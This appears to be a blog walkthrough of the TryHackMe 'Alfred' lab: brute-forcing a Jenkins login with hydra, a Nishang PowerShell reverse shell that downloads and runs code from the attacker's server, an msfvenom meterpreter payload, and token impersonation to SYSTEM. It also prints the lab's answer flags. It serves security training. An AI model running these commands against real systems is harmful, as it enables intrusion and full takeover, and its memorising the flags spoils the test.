Home Alfred
Post
Cancel

Alfred

Posted Jun 18, 2022 Updated Jan 10, 2023
By 0xskar
7 min read

Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

https://tryhackme.com/room/alfred

Task 1 - Initial Access

In this room, we’ll learn how to exploit a common misconfiguration on a widely used automation server(Jenkins - This tool is used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they made change to it). After which, we’ll use an interesting privilege escalation method to get full system access.

Since this is a Windows application, we’ll be using Nishang to gain initial access. The repository contains a useful set of scripts for initial access, enumeration and privilege escalation. In this case, we’ll be using the reverse shell scripts.

Answer the questions below

How many ports are open? (TCP only)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

┌──(0xskar㉿cocokali)-[~/thm/rooms/alfred]
└─$ sudo nmap -sT -T4 10.10.112.98 -Pn -sC
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-19 01:00 PDT
Nmap scan report for 10.10.112.98
Host is up (0.19s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  ms-wbt-server
|_ssl-date: 2022-06-19T08:00:36+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: ALFRED
|   NetBIOS_Domain_Name: ALFRED
|   NetBIOS_Computer_Name: ALFRED
|   DNS_Domain_Name: alfred
|   DNS_Computer_Name: alfred
|   Product_Version: 6.1.7601
|_  System_Time: 2022-06-19T08:00:36+00:00
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2022-06-18T07:20:36
|_Not valid after:  2022-12-18T07:20:36
8080/tcp open  http-proxy
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry 
|_/
  • 3

What is the username and password for the log in panel(in the format username:password)

http://10.10.112.98:8080/login

Some google we find the default login is admin/password but that password doesnt work. Need to find the pass

Intercepting the login request in burpsuite proxy we can see this is a POST request to /j_acegi_security_check

  • Lets try to use hydra to find a login hydra -t 16 -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt 10.10.21.129 -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^:Invalid username or password"

0xskar

Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString(‘http://your-ip:your-port/Invoke-PowerShellTcp.ps1’);Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port You first need to download the Powershell script, and make it available for the server to download. You can do this by creating a http server with python: python3 -m http.server**

What is the user.txt flag?

  1. wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
  2. python3 -m http.server
  3. paste code into Jenkins Project Configurepowershell iex (New-Object Net.WebClient).DownloadString('http://10.x.x.x:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.x.x.x -Port 6667

PS C:\users\bruce\Desktop> type user.txt 79007a09481963edf2e1321abd9ae2a0

Task 2 - Switching Shells

  1. Create payload msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.x.x.x LPORT=6666 -f exe -o shell.exe
  2. Input into Jenkins after starting a new project with copied settings 3. to download payload to target: powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.x.x.x:8000/shell.exe','shell.exe')"
  3. Setup listener in msfconsole on kali: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 10.x.x.x set LPORT 6666 run
  4. Traverse to new directory with shell.exe and input into first Powershell to start meterpreter reverse shell: Start-Process "shell.exe"

0xskar

Answer the questions below

What is the final size of the exe payload that you generated?

  • 73802

Task 3 - Privilege Escalation

Notes:

  • account tokens are assigned to an account when users login or authenticate
  • this is done by LSASS.exe
  • access tokens consist of user SIDs, group SIDs, privileges.
  • https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens

The most commonly abused privileges:

  • SeImpersonatePrivilege
  • SeAssignPrimaryPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege
  • https://www.exploit-db.com/papers/42556

Answer the questions below

View all the privileges using whoami /priv

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State   
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Disabled
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
SeCreatePagefilePrivilege       Create a pagefile                         Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege         Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
SeTimeZonePrivilege             Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled

You can see that two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let’s use the incognito module that will allow us to exploit this vulnerability. Enter: load incognito to load the incognito module in metasploit. Please note, you may need to use the use incognito command if the previous command doesn’t work. Also ensure that your metasploit is up to date.

  • load incognito

To check which tokens are available, enter the list_tokens -g. We can see that the BUILTIN\Administrators token is available. Use the impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators token. What is the output when you run the getuid command?

  • list_tokens -g
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53

[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\AppHostSvc
NT SERVICE\AudioEndpointBuilder
NT SERVICE\BFE
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\Dnscache
NT SERVICE\eventlog
NT SERVICE\EventSystem
NT SERVICE\FDResPub
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\MMCSS
NT SERVICE\PcaSvc
NT SERVICE\PlugPlay
NT SERVICE\RpcEptMapper
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\Spooler
NT SERVICE\TrkWks
NT SERVICE\TrustedInstaller
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\Winmgmt
NT SERVICE\WSearch
NT SERVICE\wuauserv

Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\AudioSrv
NT SERVICE\DcomLaunch
NT SERVICE\Dhcp
NT SERVICE\DPS
NT SERVICE\lmhosts
NT SERVICE\MpsSvc
NT SERVICE\PolicyAgent
NT SERVICE\Power
NT SERVICE\ShellHWDetection
NT SERVICE\wscsvc
  • meterpreter > impersonate_token "BUILTIN\Administrators"
1
2
3
4
5
6
7

meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions (above questions answer). The safest process to pick is the services.exe process. First use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 396   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 524   516   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 572   564   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 580   516   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 608   564   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 668   580   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe

1
2
3

meterpreter > migrate 668
[*] Migrating from 2632 to 668...
[*] Migration completed successfully.

read the root.txt file at C:\Windows\System32\config

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

meterpreter > shell
Process 2840 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd c:\Windows\System32\config
cd c:\Windows\System32\config

c:\Windows\System32\config>type root.txt
type root.txt
dff0f748678f280250f25a45b8046b4a
Walkthrough, Tryhackme, CTF
jenkins nmap burp hydra metasploit windows
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents